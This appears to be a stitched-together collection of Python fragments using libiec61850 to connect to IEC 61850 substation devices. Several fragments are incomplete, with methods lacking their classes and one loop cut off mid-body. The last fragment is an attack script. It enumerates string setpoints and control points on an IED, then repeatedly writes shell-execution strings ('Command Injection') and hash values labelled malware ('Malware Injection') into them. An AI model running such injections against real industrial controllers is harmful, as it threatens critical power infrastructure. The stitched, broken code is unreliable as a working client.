def getLNlist_fromIED(ip):
res_list = []
con = iec61850.IedConnection_create()
error = iec61850.IedConnection_connect(con, ip, tcpPort)
state = iec61850.IedConnection_getState(con)
if (error == iec61850.IED_ERROR_OK):
[deviceList, error] = iec61850.IedConnection_getLogicalDeviceList(con)
device = iec61850.LinkedList_getNext(deviceList)
size = iec61850.LinkedList_size(deviceList)
while device: #Iterate over each device from deviceList
[logicalNodes,
error] = iec61850.IedConnection_getLogicalDeviceDirectory(
con, iec61850.toCharP(device.data))
lnode = iec61850.LinkedList_getNext(logicalNodes)
while lnode: #Iterate over each node from LNodeList
LN_name = iec61850.toCharP(lnode.data)
res_list.append(LN_name)
lnode = iec61850.LinkedList_getNext(lnode)
iec61850.LinkedList_destroy(logicalNodes)
device = iec61850.LinkedList_getNext(device)
iec61850.LinkedList_destroy(deviceList)
iec61850.IedConnection_close(con)
else:
print("Connection error")
sys.exit(-1)
iec61850.IedConnection_destroy(con)
return res_list
def testClient():
con = iec61850.IedConnection_create()
error = iec61850.IedConnection_connect(con, "localhost", tcpPort)
if (error == iec61850.IED_ERROR_OK):
# Accessing to SAV values
theVal = "testmodelSENSORS/TTMP1.TmpSv.instMag.f"
theValType = iec61850.IEC61850_FC_MX
temperatureValue = iec61850.IedConnection_readFloatValue(
con, theVal, theValType)
assert (temperatureValue[1] == 0)
newValue = temperatureValue[0] + 10
err = iec61850.IedConnection_writeFloatValue(con, theVal, theValType,
newValue)
assert (err == 21)
# Accessing to ASG values
theVal = "testmodelSENSORS/TTMP1.TmpSp.setMag.f"
theValType = iec61850.IEC61850_FC_SP
temperatureSetpoint = iec61850.IedConnection_readFloatValue(
con, theVal, theValType)
print(temperatureSetpoint)
assert (temperatureValue[1] == 0)
newValue = temperatureValue[0] + 10
err = iec61850.IedConnection_writeFloatValue(con, theVal, theValType,
newValue)
assert (err == 0)
temperatureSetpoint = iec61850.IedConnection_readFloatValue(
con, theVal, theValType)
print(temperatureSetpoint)
assert (temperatureSetpoint[0] == newValue)
iec61850.IedConnection_close(con)
else:
print("Connection error")
sys.exit(-1)
iec61850.IedConnection_destroy(con)
print("client ok")
def run_client(ip, dt, var):
print(ip, dt, var)
con = iec61850.IedConnection_create()
timeout = iec61850.IedConnection_setConnectTimeout(con, 2000)
error = iec61850.IedConnection_connect(con, ip, tcpPort)
state = iec61850.IedConnection_getState(con)
if (error == iec61850.IED_ERROR_OK and state):
print("Good connection")
if dt == 'b':
[booleanValue, error] = iec61850.IedConnection_readBooleanValue(
con, var, iec61850.IEC61850_FC_ST)
print("booleanValue: ", booleanValue)
elif dt == 'f':
[analogValue, error
] = iec61850.IedConnection_readFloatValue(con, var,
iec61850.IEC61850_FC_MX)
print("Analog Value: ", analogValue)
elif dt == 't':
time = iec61850.Timestamp()
[timeStampValue,
error] = iec61850.IedConnection_readTimestampValue(
con, var, iec61850.IEC61850_FC_MX, time)
print("timeStampValue: ",
iec61850.Timestamp_getTimeInSeconds(time))
elif dt == 'q':
[qualityValue, error] = iec61850.IedConnection_readQualityValue(
con, var, iec61850.IEC61850_FC_MX)
print("qualityValue: ", qualityValue)
else:
print("Connection error status")
sys.exit(-1)
iec61850.IedConnection_destroy(con)
print("Client OK")
def __init__(self, ip='127.0.0.1', tcpPort=102):
try:
self.__con = iec61850.IedConnection_create()
self.__timeout = iec61850.IedConnection_setConnectTimeout(
self.__con, 2000)
self.__error = iec61850.IedConnection_connect(
self.__con, ip, tcpPort)
if (self.__error == iec61850.IED_ERROR_OK):
running = 1
else:
print("ошибка", self.__error)
except Exception as e:
print('Connection exception: ', str(e))
def main():
con = iec61850.IedConnection_create()
err = iec61850.IedConnection_connect(con, "192.168.1.41", 102)
[deviceList, err] = iec61850.IedConnection_getLogicalDeviceList(con)
device = iec61850.LinkedList_getNext(deviceList)
while device:
print("LD: {}".format(iec61850.toCharP(device.data)))
[LN, err] = iec61850.IedConnection_getLogicalDeviceDirectory(
con, iec61850.toCharP(device.data))
device = iec61850.LinkedList_getNext(device)
iec61850.LinkedList_destroy(deviceList)
def checkConnected(ip):
try:
con = iec61850.IedConnection_create()
error = iec61850.IedConnection_connect(con, ip, tcpPort)
state = iec61850.IedConnection_getState(con)
if (error == iec61850.IED_ERROR_OK):
iec61850.IedConnection_destroy(con)
return True
else:
iec61850.IedConnection_destroy(con)
return False
except Exception:
print("Connection error")
sys.exit(-1)
iec61850.IedConnection_destroy(con)
def install_handler1(self):
print("Start")
hostname = "localhost"
tcpPort = 102
con = iec61850.IedConnection_create()
error = iec61850.IedConnection_connect(con, hostname, tcpPort)
print(str(error))
CB_PROTO = CFUNCTYPE(None, c_void_p, c_void_p)
cbinst = CB_PROTO(self.func_handler)
val = c_int()
api = CDLL("/home/ivan/Projects/libiec61850/build/src/libiec61850.so")
ReportHandler = api.IedConnection_installReportHandlerAddr
ReportHandler.argtypes = [
c_uint, c_char_p, c_char_p, CB_PROTO, c_void_p
]
ReportHandler.restype = None
addr = iec61850.IedConnection_ToAddress(con)
rcb, error = iec61850.IedConnection_getRCBValues(
con, "TEMPLATELD0/LLN0.BR.brcbST0101", None)
print("RCB:" + str(rcb))
rid = iec61850.ClientReportControlBlock_getRptId(rcb)
print("OriginalID: " + rid)
rptRef = create_string_buffer(b"TEMPLATELD0/LLN0.BR.brcbST0101")
rptID = create_string_buffer(b"TEMPLATELD0/LLN0$BR$brcbST0101")
ReportHandler(addr, rptRef, rptID, cbinst, None)
print("Enabled " +
str(iec61850.ClientReportControlBlock_getRptEna(rcb)))
iec61850.ClientReportControlBlock_setTrgOps(
rcb, iec61850.TRG_OPT_DATA_UPDATE | iec61850.TRG_OPT_GI)
iec61850.ClientReportControlBlock_setRptEna(rcb, True)
error = iec61850.IedConnection_setRCBValues(
con, rcb,
iec61850.RCB_ELEMENT_RPT_ENA | iec61850.RCB_ELEMENT_TRG_OPS, True)
print(error)
if (error == iec61850.IED_ERROR_OK):
print("Connection is OK")
else:
print("Connection error status")
print("Enabled " +
str(iec61850.ClientReportControlBlock_getRptEna(rcb)))
input("Wait input ... ")
iec61850.IedConnection_close(con)
iec61850.IedConnection_destroy(con)
def run(self):
self.logger.debug("trying to connect...")
try:
self._con = iec61850.IedConnection_create()
self._timeout = iec61850.IedConnection_setConnectTimeout(
self._con,
2000
)
self._error = iec61850.IedConnection_connect(
self._con,
self._ip,
self._tcp_port
)
if(self._error == iec61850.IED_ERROR_OK):
self.logger.debug("connection established")
else:
self.logger.debug("no connection")
except Exception as e:
self.logger.debug("problem with connection %s", e)
sys.path.insert(0, "libiec61850/pyiec61850")
import iec61850
from datetime import datetime
def signal_handler(signal, frame):
global running
running =0
print('You pressed Ctrl+C!')
if __name__=="__main__":
now = datetime.now();
current_time = now.strftime("%H:%M:%S");
print("Starting Client At Time %s" % current_time);
#Create Client Connection
con = iec61850.IedConnection_create()
error = iec61850.IedConnection_connect(con, "localhost", 8102);
if (error == iec61850.IED_ERROR_OK):
[deviceList, error] = iec61850.IedConnection_getLogicalDeviceList(con)
device = iec61850.LinkedList_getNext(deviceList)
print("Connected to Server.\n")
#Show Logical Node, Logical Device and Data Object inside the Server
while device:
LD_name=iec61850.toCharP(device.data)
print("LD: %s" % LD_name)
[logicalNodes, error] = iec61850.IedConnection_getLogicalDeviceDirectory(con, LD_name)
logicalNode = iec61850.LinkedList_getNext(logicalNodes)
while logicalNode:
def main(host,port,attack,it,con):
attack12 =[]
visable_string_type =['$NamPlt','$NamPlt$d','$NamPlt$IdNs','$NamPlt$swRev','$NamPlt$vendor','LogRef','DatSet','RptID']
attack3 =[]
commands= [
'return execl (\"/bin/pwd\", \"pwd\", NULL);',
'system((\"/bin/pwd\", \"pwd\", NULL);',
'popen((\"/bin/pwd\", \"pwd\", NULL);',
'fp = popen(\"/bin/ls /etc/\", \"r\");printf(\'%s\',fp);',
'fp = system(\'ls\');printf(\'%s\',fp);',
'sshell ss; ss.argv.insert(\"ls\");o_(ss.link);',
'CALL \"SYSTEM\" USING BY CONTENT \"ls\"',
'Run(@ComSpec & \" /c \" & \'pause\', \"\", @SW_HIDE)',
'system(\"pause\");',
'execute_process(COMMAND ls)',
'spawn,\"ls\",result',
'System runCommand(\"ls\") stdout println',
'var sh = new ActiveXObject(\"WScript.Sh\");sh.run(\"/c ls\");',
'\"ls\" system.',
'run(\`ls\`)',
'r: 4:\"ls\"',
'> (io:format (os:cmd \"ls -alrt\"))',
'drive1$ = left$(Drives$,1) run \"ls /\";drive1$;\"',
'print first butfirst shell [ls -a] ; ..',
'contents=$(shell cat foo) curdir=\`pwd\`']
#https://rosettacode.org/wiki/Execute_a_system_command
malware_examples=[
'414af3620d0843f07318a2a33f65667d',
'0c8b4b357d4f059177ee752a2a3230a5',
'f16ea91bb744e4abf5b0424e2a7d9246',
'902d64217c8a0968a7b24af3001abba5',
'e19167569032677bb8b8a8ce78af11f8',
'a787ba60426e50c77ac8cb0598b634af',
'b6c26bbaefdbabedfd71b537b1cd7586',
'cbf48f823c965b40b3cb1c31c9c51bf6',
'465c25e393f2e15e337ce5ef817c839e',
'7209054e29ea7ebfe0828b11609f0db0',
'9f0bf21fd75f540dce7fc29da799cbe1',
'f4ecba48d00f3e86b7ff72bfccc03410',
'417f692bf04685b1e282f2ea8d8933bb',
'16ee94648fdb34280c838e522292070f',
'fe59c96c664cf49a857469fa4a37f646',
'5fb781ff11297732851186f3f7ac4b6a',
'bf134af3a00189da424657a382913da5',
'75b50a3fae06f054cf3f28d80cfa4e15',
'71db409e39688340d0dffff94a012e2e',
'3b3eaf98db1df32147aadccf66826025',
'0199d9d68ec0af5819d6137feb04310e']
#Create Client Connection
con = iec61850.IedConnection_create()
error = iec61850.IedConnection_connect(con, host,port);
if (error == iec61850.IED_ERROR_OK):
[deviceList, error] = iec61850.IedConnection_getLogicalDeviceList(con)
device = iec61850.LinkedList_getNext(deviceList)
print("Connected to Server.\n")
#Show Logical Node, Logical Device and Data Object inside the Server
while device:
logical_device=iec61850.toCharP(device.data)
print("Name of Logical Device: %s" % logical_device)
[logicalNodes, error] = iec61850.IedConnection_getLogicalDeviceDirectory(con, logical_device)
logicalNode = iec61850.LinkedList_getNext(logicalNodes)
while logicalNode:
LN_name=iec61850.toCharP(logicalNode.data)
#print(" LN: %s" % LN_name)
[LNobjects, error] = iec61850.IedConnection_getLogicalNodeVariables(con, logical_device+"/"+LN_name)
LNobject = iec61850.LinkedList_getNext(LNobjects)
while LNobject:
#print(" DO: %s" % iec61850.toCharP(LNobject.data))
LNobject = iec61850.LinkedList_getNext(LNobject)
try:
#Attack1 and Attack2
if attack == 1 or attack == 2:
for i in visable_string_type:
if(str(iec61850.toCharP(LNobject.data)).endswith(i)):
attack12.append(str(iec61850.toCharP(LNobject.data)))
print(str(iec61850.toCharP(LNobject.data)))
#Attack3
if attack == 3:
if str(iec61850.toCharP(LNobject.data)).endswith('$Oper$ctlVal'):
attack3.append(str(iec61850.toCharP(LNobject.data)))
print(str(iec61850.toCharP(LNobject.data)))
except (TypeError, AttributeError):
pass
iec61850.LinkedList_destroy(LNobjects)
logicalNode = iec61850.LinkedList_getNext(logicalNode)
iec61850.LinkedList_destroy(logicalNodes)
device = iec61850.LinkedList_getNext(device)
iec61850.LinkedList_destroy(deviceList)
running = 1;
signal.signal(signal.SIGINT, signal_handler);
sp=[]
ps_r=[]
sp_w =[]
while running:
if attack == 1:
count = 0
while count < it:
count+=1
k = 0
for item in attack12:
lln_param = logical_device+"/"+item
type = iec61850.IEC61850_FC_SP #Function Code - Setpoint
for c in commands:
sp_w = iec61850.IedConnection_writeVisibleStringValue(con, lln_param, type, c)
print(k,"- Working:",lln_param,c)
time.sleep(0.1)
k+=1
print("Finished Example Attack 1 - Command Injection")
print("Attacked parameters:\n", attack12)
break
if attack == 2:
count = 0
while count < it:
count+=1
k = 0
for item in attack12:
lln_param = logical_device+"/"+item
type = iec61850.IEC61850_FC_SP #Function Code - Setpoint
for m in malware_examples:
sp_w = iec61850.IedConnection_writeVisibleStringValue(con, lln_param, type, m)
print(k,"- Working:",lln_param,m)
time.sleep(0.1)
k+=1
print("Finished Example Attack 2 - Malware Injection")
print("Attacked parameters:\n", attack12)
break
#MMS Structure
if attack == 3:
print("attack 3 ................")
print(attack3)
break
